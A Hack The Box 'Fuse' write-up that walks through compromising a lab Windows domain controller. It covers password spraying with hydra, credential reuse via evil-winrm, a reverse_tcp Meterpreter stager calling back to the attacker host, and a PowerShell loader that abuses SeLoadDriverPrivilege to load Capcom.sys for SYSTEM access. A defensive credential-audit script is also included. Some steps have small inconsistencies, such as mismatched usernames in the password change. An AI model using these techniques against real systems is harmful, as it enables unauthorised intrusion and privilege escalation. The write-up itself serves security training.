08/03/2021

Hackthebox Fuse Writeup – 10.10.10.193

ENUMERATION

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Let’s take a look at the site that runs on port 80.

The site is PaperCut's print logger, and its HTML log pages reveal usernames but no passwords. The usernames go into user.txt; for passwords, build a wordlist from the log pages with CeWL, keeping numbers (--with-number), since internal passwords are often derived from the names that appear on such pages.

root@kali:~/htb/boxes/fuse# cat user.txt 
pmerton
tlavel
sthompson
bhult
administrator
bnielson
root@kali:~/htb/boxes/fuse# cewl -w pass.txt fuse.fabricorp.local/papercut/logs/html/index.htm --with-number -v

CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://fuse.fabricorp.local/papercut/logs/html/index.htm
Visiting: http://fuse.fabricorp.local/papercut/logs/html/index.htm, got response code 200
Attribute text found:
 
Offsite link, not following: http://www.papercut.com/?printlogger
Visiting: http://fuse.fabricorp.local:80/papercut/logs/html/../../resources/about.htm referred from http://fuse.fabricorp.local/papercut/logs/html/index.htm, got response code 200
Attribute text found:
 Follow PaperCutDev on Twitter 

Spray the generated wordlist against SMB with hydra, using the harvested usernames. That is 6 users times 169 words, about a thousand attempts, so check the domain lockout threshold first where you can (rpcclient's getdompwinfo) rather than locking accounts out:

root@kali:~/htb/boxes/fuse# hydra -L user.txt -P pass.txt 10.10.10.193 smb
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-16 16:36:43
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 1014 login tries (l:6/p:169), ~1014 tries per task
[DATA] attacking smb://10.10.10.193:445/

[445][smb] host: 10.10.10.193   login: tlavel   password: Fabricorp01
[STATUS] 359.00 tries/min, 359 tries in 00:01h, 655 to do in 00:02h, 1 active
[445][smb] host: 10.10.10.193   login: bhult   password: Fabricorp01
[STATUS] 360.50 tries/min, 721 tries in 00:02h, 293 to do in 00:01h, 1 active
[445][smb] host: 10.10.10.193   login: bnielson   password: Fabricorp01
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-16 16:39:29

Hydra reports three accounts that accept the same password:
tlavel=Fabricorp01
bhult=Fabricorp01
bnielson=Fabricorp01

root@kali:~/htb/boxes/fuse# smbclient -L 10.10.10.193 -U fabricorp/tlavel
Enter FABRICORP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

NT_STATUS_PASSWORD_MUST_CHANGE means the password is correct but the account is flagged "User must change password at next logon", so no session is granted until it is changed. Hydra still reports such credentials as valid, because the server accepts the password before refusing the session; the flag only shows up when you try to use them.

The change can be done remotely over SMB with smbpasswd, which Kali ships by default. The new password has to satisfy the domain's complexity and history policy, otherwise the change is rejected.

root@kali:~/htb/boxes/fuse# smbpasswd -r 10.10.10.193 -U bhult
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.
(The new password was set to "Fabricorp012".)

With the changed password we can authenticate to what we already know is a domain controller. Let's use rpcclient, which is very useful here, to enumerate domain users and printers.

root@kali:~/htb/boxes/fuse# rpcclient -U bhult //10.10.10.193
Enter WORKGROUP\bhult's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]
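The password is sitting in the printer's Location field (the "description" rpcclient prints is PRINTER_INFO_1's pDescription, which is "Name,Driver,Location"). Free-text fields like this are a classic place for credentials to leak, so here is an added example, not part of the original writeup, that audits them from a domain-joined Windows host as any domain user. The regex is my assumption about what a leaked credential looks like; tune it to your environment.

```powershell
# Added example (not from the writeup): audit the free-text fields where the
# password above was found. Run as any domain user on a domain-joined host.
# The regex is an assumption about what a leaked credential looks like; tune it.
$SecretPattern = '(?i)\b(pass(word|wd)?|pwd|cred(ential)?s?)\b\s*[:=]\s*([^\s)]+)'

function Find-SecretInText {
    param([string]$Source, [string]$Text)
    if ([string]::IsNullOrWhiteSpace($Text)) { return }
    foreach ($m in [regex]::Matches($Text, $SecretPattern)) {
        # Group 4 is the value after "password:" etc.; the whole match is kept for context.
        [pscustomobject]@{ Source = $Source; Match = $m.Value; Candidate = $m.Groups[4].Value }
    }
}

# 1. Local print queues. Location is where the Fuse leak lives; Comment is the
#    other free-text field admins fill in.
foreach ($p in Get-CimInstance -ClassName Win32_Printer) {
    Find-SecretInText -Source "printer:$($p.Name)/Location" -Text $p.Location
    Find-SecretInText -Source "printer:$($p.Name)/Comment"  -Text $p.Comment
}

# 2. Directory objects. description and info are readable by every authenticated
#    user by default, so a "temporary" password left there is domain-wide knowledge.
$searcher = [adsisearcher]'(|(objectClass=user)(objectClass=computer)(objectClass=group)(objectClass=printQueue))'
$searcher.PageSize = 1000
[void]$searcher.PropertiesToLoad.AddRange([string[]]('distinguishedname','description','info','location'))
foreach ($r in $searcher.FindAll()) {
    $dn = [string]$r.Properties['distinguishedname'][0]
    foreach ($attr in 'description','info','location') {
        foreach ($v in $r.Properties[$attr]) {
            Find-SecretInText -Source "ad:$dn/$attr" -Text ([string]$v)
        }
    }
}
```

On the description above, the pattern matches "password: $fab@s3Rv1ce$1" with the candidate "$fab@s3Rv1ce$1". Running this from the blue side after the engagement is the cheap fix: it takes one read-only domain account and finds exactly the kind of leak that turned a print-log username into a shell below.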

That is one more credential. Of the enumerated accounts, svc-print is the natural match for a print service password:
svc-print:$fab@s3Rv1ce$1
With this account, let's try to get a shell on Fuse over WinRM using evil-winrm.

root@kali:~/htb/boxes/fuse# evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
bash: /usr/local/bin/evil-winrm: /usr/bin/ruby2.5: bad interpreter: No such file or directory

evil-winrm is not corrupt; the wrapper script in /usr/local/bin has a stale shebang pointing at /usr/bin/ruby2.5, which is no longer installed. Reinstalling the gem regenerates the wrapper for the current Ruby.

root@kali:~/htb/boxes/fuse# gem install evil-winrm
Fetching gyoku-1.3.1.gem
Fetching logging-2.2.2.gem
Fetching little-plugger-1.1.4.gem
Fetching gssapi-1.3.0.gem
Fetching nori-2.6.0.gem
Fetching httpclient-2.8.3.gem
Fetching rubyntlm-0.6.2.gem
Fetching winrm-2.3.4.gem
Fetching evil-winrm-2.3.gem
Fetching winrm-fs-1.3.4.gem
Successfully installed gssapi-1.3.0
Successfully installed gyoku-1.3.1
Successfully installed httpclient-2.8.3
Successfully installed little-plugger-1.1.4
Successfully installed logging-2.2.2
Successfully installed nori-2.6.0
Successfully installed rubyntlm-0.6.2
Successfully installed winrm-2.3.4
Successfully installed winrm-fs-1.3.4
Happy hacking! :)
Successfully installed evil-winrm-2.3
Parsing documentation for gssapi-1.3.0
Installing ri documentation for gssapi-1.3.0
Parsing documentation for gyoku-1.3.1
Installing ri documentation for gyoku-1.3.1
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Parsing documentation for little-plugger-1.1.4
Installing ri documentation for little-plugger-1.1.4
Parsing documentation for logging-2.2.2
Installing ri documentation for logging-2.2.2
Parsing documentation for nori-2.6.0
Installing ri documentation for nori-2.6.0
Parsing documentation for rubyntlm-0.6.2
Installing ri documentation for rubyntlm-0.6.2
Parsing documentation for winrm-2.3.4
Installing ri documentation for winrm-2.3.4
Parsing documentation for winrm-fs-1.3.4
Installing ri documentation for winrm-fs-1.3.4
Parsing documentation for evil-winrm-2.3
Installing ri documentation for evil-winrm-2.3
Done installing documentation for gssapi, gyoku, httpclient, little-plugger, logging, nori, rubyntlm, winrm, winrm-fs, evil-winrm after 3 seconds
10 gems installed
Try connecting again:

root@kali:~/htb/boxes/fuse# evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents>
*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> dir


    Directory: C:\Users\svc-print


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         6/1/2020   1:45 AM                Desktop
d-r---        6/15/2020   1:59 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-print> cd Desktop
*Evil-WinRM* PS C:\Users\svc-print\Desktop> dir


    Directory: C:\Users\svc-print\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/14/2020   2:54 PM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-print\Desktop> type user.txt
071759c7d0fcbd76b0e60fc53be4d9e1
*Evil-WinRM* PS C:\Users\svc-print\Desktop> exit


*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents>

User flag captured; now for privilege escalation. First, a look around the box:

*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/26/2020  10:39 PM                Administrator
d-r---       11/20/2016   6:39 PM                Public
d-----        5/30/2020   4:31 PM                sthompson
d-----        5/31/2020   5:08 PM                svc-print


*Evil-WinRM* PS C:\Users> cd sthompson
*Evil-WinRM* PS C:\Users\sthompson> dir
Access to the path 'C:\Users\sthompson' is denied.
At line:1 char:1
+ dir
+ ~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\sthompson:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\sthompson> cd ..
*Evil-WinRM* PS C:\Users> cd Public
*Evil-WinRM* PS C:\Users\Public> dir
Access to the path 'C:\Users\Public' is denied.
At line:1 char:1
+ dir
+ ~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Public:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\Public> cd ..
*Evil-WinRM* PS C:\Users> cd ..
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/29/2020   5:13 PM                Departments
d-----        5/29/2020   5:23 PM                HP Universal Print Driver
d-----        5/29/2020   4:36 PM                inetpub
d-----        5/26/2020   6:08 PM                PerfLogs
d-r---        6/11/2020   1:57 AM                Program Files
d-----        5/29/2020   4:54 PM                Program Files (x86)
d-----         6/1/2020   4:24 AM                test
d-r---        5/31/2020   5:08 PM                Users
d-----        6/14/2020   2:54 PM                Windows
-ar---        6/10/2020   6:22 PM            334 readme.txt


*Evil-WinRM* PS C:\> type readme.txt
// MFT printing format issue

note to HP engineer:

The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used.

This is a production environment and the "solution" should be developed and confirmed working in your testbed

All changes will be reverted every 2 mins.
*Evil-WinRM* PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeLoadDriverPrivilege is enabled for svc-print, and that is the escalation path: a holder of this privilege can register and load an arbitrary kernel driver through NtLoadDriver, even from a registry key under HKCU that the user controls. Loading a legitimately signed but vulnerable driver (Capcom.sys, which lets user mode execute code in the kernel) then gets us to SYSTEM-level code execution. I followed the article I linked closely for the rest of this, and thank its author for a very well written piece.

First, generate a Meterpreter stager with msfvenom and start a handler for it:

root@kali:~/htb/boxes/fuse# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1515 -f psh -o meter.ps1

root@kali:~/htb/boxes/fuse# msfdb run
[+] Starting database

msf5> handler -H 10.10.14.2 -P 1515 -p windows/x64/meterpreter/reverse_tcp
*Evil-WinRM* PS C:\Users\svc-print> upload meter.ps1
Info: Uploading meter.ps1 to C:\Users\svc-print\meter.ps1
                                                    
Data: 4336 bytes of 4336 bytes copied

Info: Upload successful!

Run the stager on the target to get a Meterpreter session, then upload the driver loader and the driver:

*Evil-WinRM* PS C:\Users\svc-print> ./meter.ps1
*Evil-WinRM* PS C:\Users\svc-print> upload eoploaddriver64.exe
Info: Uploading eoploaddriver64.exe to C:\Users\svc-print\eoploaddriver64.exe
                                                         
Data: 15700 bytes of 15700 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print> upload Capcom.sys
Info: Uploading Capcom.sys to C:\Users\svc-print\Capcom.sys

                                                             
Data: 95424 bytes of 95424 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print> 

Now register and load Capcom.sys with EoPLoadDriver, which creates a service key under the current user's hive (\Registry\User\<SID>\System\CurrentControlSet\custom here), points its ImagePath at the uploaded Capcom.sys and calls NtLoadDriver using SeLoadDriverPrivilege. Then use exploit/windows/local/capcom_sys_exec against the Meterpreter session.
Capcom.sys reference: https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

If you don't want to deal with compiling, you can download and use the releases I created:
https://github.com/umiterkol/EoPLoadDriver/releases

*Evil-WinRM* PS C:\Users\svc-print\Documents> ./eoploaddriver64.exe System\CurrentControlSet\custom C:\Users\svcprint\Documents\Capcom.sys
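What eoploaddriver64.exe does under the hood, as an added PowerShell example that is not from the writeup and not the EoPLoadDriver source: it mirrors the technique (enable the privilege that whoami /priv showed, create a service key under HKCU, call NtLoadDriver on it), so the loader step above is not a black box. The driver path and the key name "custom" are assumptions chosen to match the command above.

```powershell
# Added example, not the writeup's code nor EoPLoadDriver itself: the same
# technique in PowerShell. Assumptions: this runs as the account holding
# SeLoadDriverPrivilege (svc-print on Fuse), the driver is already on disk at
# $DriverPath, and "custom" is just a key name.
param(
    [string]$DriverPath = 'C:\Users\svc-print\Documents\Capcom.sys',
    [string]$KeyName    = 'custom',
    [switch]$Unload
)

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public static class NtDriver
{
    [StructLayout(LayoutKind.Sequential)]
    struct UNICODE_STRING { public ushort Length; public ushort MaximumLength; public IntPtr Buffer; }

    [DllImport("ntdll.dll")] static extern int NtLoadDriver(ref UNICODE_STRING name);
    [DllImport("ntdll.dll")] static extern int NtUnloadDriver(ref UNICODE_STRING name);
    // NTSTATUS RtlAdjustPrivilege(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN); BOOLEAN is one byte.
    [DllImport("ntdll.dll")] static extern int RtlAdjustPrivilege(int priv, byte enable, byte thread, out byte was);

    const int SE_LOAD_DRIVER_PRIVILEGE = 10;

    // Turns the privilege on in this token. It must already be assigned to the
    // account (whoami /priv lists it); this cannot grant it.
    public static int EnableLoadDriver() { byte was; return RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 1, 0, out was); }

    static int Call(string ntRegPath, bool load)
    {
        // Build the UNICODE_STRING by hand so the buffer outlives the call.
        var u = new UNICODE_STRING();
        u.Buffer = Marshal.StringToHGlobalUni(ntRegPath);
        u.Length = (ushort)(ntRegPath.Length * 2);
        u.MaximumLength = (ushort)(u.Length + 2);
        try { return load ? NtLoadDriver(ref u) : NtUnloadDriver(ref u); }
        finally { Marshal.FreeHGlobal(u.Buffer); }
    }
    public static int Load(string ntRegPath)   { return Call(ntRegPath, true); }
    public static int Unload(string ntRegPath) { return Call(ntRegPath, false); }
}
'@

$status = [NtDriver]::EnableLoadDriver()
if ($status -ne 0) {
    throw ('Could not enable SeLoadDriverPrivilege (NTSTATUS 0x{0:X8}); this token does not hold it.' -f $status)
}

# NtLoadDriver takes a registry path in the object-manager namespace and does not
# insist on HKLM\SYSTEM\CurrentControlSet\Services, so a key under the caller's own
# hive (HKCU = \Registry\User\<SID>) works. That is the whole trick.
$sid     = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$regPath = "HKCU:\System\CurrentControlSet\$KeyName"
$ntPath  = "\Registry\User\$sid\System\CurrentControlSet\$KeyName"

if ($Unload) {
    $status = [NtDriver]::Unload($ntPath)
    Remove-Item -Path $regPath -Recurse -Force -ErrorAction SilentlyContinue
    'NtUnloadDriver {0} -> NTSTATUS 0x{1:X8}' -f $ntPath, $status
} else {
    # A minimal kernel-driver service entry: Type 1 = SERVICE_KERNEL_DRIVER,
    # ImagePath as an NT path (\??\ prefix) to the driver file.
    New-Item -Path $regPath -Force | Out-Null
    New-ItemProperty -Path $regPath -Name ImagePath -PropertyType ExpandString -Value "\??\$DriverPath" -Force | Out-Null
    New-ItemProperty -Path $regPath -Name Type      -PropertyType DWord        -Value 1                 -Force | Out-Null
    $status = [NtDriver]::Load($ntPath)
    # 0 = STATUS_SUCCESS; 0xC000010E = STATUS_IMAGE_ALREADY_LOADED, which is also fine.
    'NtLoadDriver {0} -> NTSTATUS 0x{1:X8}' -f $ntPath, $status
}
```

Two things worth knowing when this is used for real: Driver Signature Enforcement is still in force, so the kernel accepts Capcom.sys only because it carries a valid signature, and the vulnerability is in what the driver then does with its IOCTL; and NtUnloadDriver needs the same privilege, so run the script with -Unload to clean up (on this box the readme says changes are reverted every two minutes anyway, so load the driver and run the exploit promptly).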

msf5 > use exploit/windows/local/capcom_sys_exec 
msf5 exploit(windows/local/capcom_sys_exec) > set session 1
session => 1
msf5 exploit(windows/local/capcom_sys_exec) > set LhOST tun0
LhOST => tun0
msf5 exploit(windows/local/capcom_sys_exec) > exploit 

[*] Started reverse TCP handler on 10.10.14.2:4444 
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/capcom_sys_exec) > 

The module aborts before doing anything: it runs a check for the Capcom driver the way it expects to find it on a vulnerable host, and because we loaded the driver ourselves under a custom key it does not recognise it. The fix is to disable that check in the module.

root@kali:~/htb/boxes/fuse# locate capcom_sys_exec
/usr/share/metasploit-framework/data/exploits/capcom_sys_exec
/usr/share/metasploit-framework/data/exploits/capcom_sys_exec/capcom_sys_exec.x64.dll
/usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb
root@kali:~/htb/boxes/fuse# vi /usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb

Comment out (prefix with #) the lines in the module that fail with not-vulnerable when the check does not pass.

Because msfconsole has already loaded the module into memory, the edit only takes effect after a reload (the reload command inside msfconsole does this; I exited and restarted instead). The msfdb reinit below also drops and recreates the database, which is not needed for the reload and only costs the stored host data.

msf5 exploit(windows/local/capcom_sys_exec) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
msf5 exploit(windows/local/capcom_sys_exec) > exit -y

root@kali:~/htb/boxes/fuse# msfdb reinit
[i] Database already started
[+] Dropping databases 'msf'
[+] Dropping databases 'msf_test'
[+] Dropping database user 'msf'
[+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml
[+] Stopping database
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

Start msfconsole again, re-establish the Meterpreter session, select it with set session, and run the module:

root@kali:~/htb/boxes/fuse# msfdb run
[i] Database already started

msf5 > use exploit/windows/local/capcom_sys_exec


msf5 exploit(windows/local/capcom_sys_exec) > 
msf5 exploit(windows/local/capcom_sys_exec) > set lhost tun0
lhost => tun0
msf5 exploit(windows/local/capcom_sys_exec) > exploit 

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Launching notepad to host the exploit...
[+] Process 956 launched.
[*] Reflectively injecting the exploit DLL into 956...
[*] Injecting exploit into 956...
[*] Exploit injected. Injecting payload into 956...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 5 opened (10.10.14.2:1515 -> 10.10.10.193:53312) at 2020-06-18 13:04:46 +0300

Meterpreter session 5 runs as Administrator on Fuse.

And rooted…

Thank you for reading.

“Please do not forget that the tools written and used here are for EDUCATIONAL PURPOSES ONLY.”

Greetings from Turkey…
